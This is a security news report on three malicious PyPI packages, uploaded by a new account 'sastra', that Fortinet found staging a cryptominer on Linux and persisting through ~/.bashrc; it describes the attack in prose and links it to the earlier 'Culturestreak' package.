New PyPI Packages Deploying Cryptominers Discovered
Three PyPI packages were discovered by Fortinet researcher, Gabby Xiong on December 5, 2023, to be deploying a cryptominer against Linux systems. These packages authored by "sastra" raised concerns as they were found to deploy cryptominers on Linux systems. The PyPI account of the author was newly created, and these malicious packages, named 'modularseven-1.0,' 'driftme-1.0,' and 'catme-1.0,' were uploaded shortly after the account's creation. Analysis of the packages also established a link to a previously identified cryptomining Python package known as "Culturestreak."
Fortinet's investigation into these packages revealed a familiar attack pattern, as the packages "conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL. The payload is then incrementally released in various stages to execute its malicious activities." The attack is initiated with an innocuous "import" statement in the init.py file, followed by executing malicious actions through various scripts and processes. These scripts were responsible for downloading additional payloads, altering file permissions, and executing the downloaded content. Among the files downloaded by the "unmi.sh" script was "config.json," a configuration file for cryptocurrency mining settings, and a CoinMiner executable. Once downloaded and set in motion, the attacker employed the "nohup" command to ensure the malicious process operated quietly in the background, persisting even after the termination of the terminal session. "The most deceptive aspect is that the attacker ensures that all these modifications are appended to the ~/.bashrc file, ensuring the reactivation of this malicious activity whenever the user initiates a new Bash shell session," Xiong explains.
While these packages shared similarities with "Culturestreak," including indicators of compromise (IoCs) and the hosting of coin mining executables, they introduced additional evasion tactics. Specifically, they stored critical commands for malicious operations in the "unmi.sh" file on a remote server, and code was minimized in the PyPI packages to enhance their ability to evade detection solutions. Fortinet's research emphasized the importance of detecting subtle behaviors indicative of potential compromise.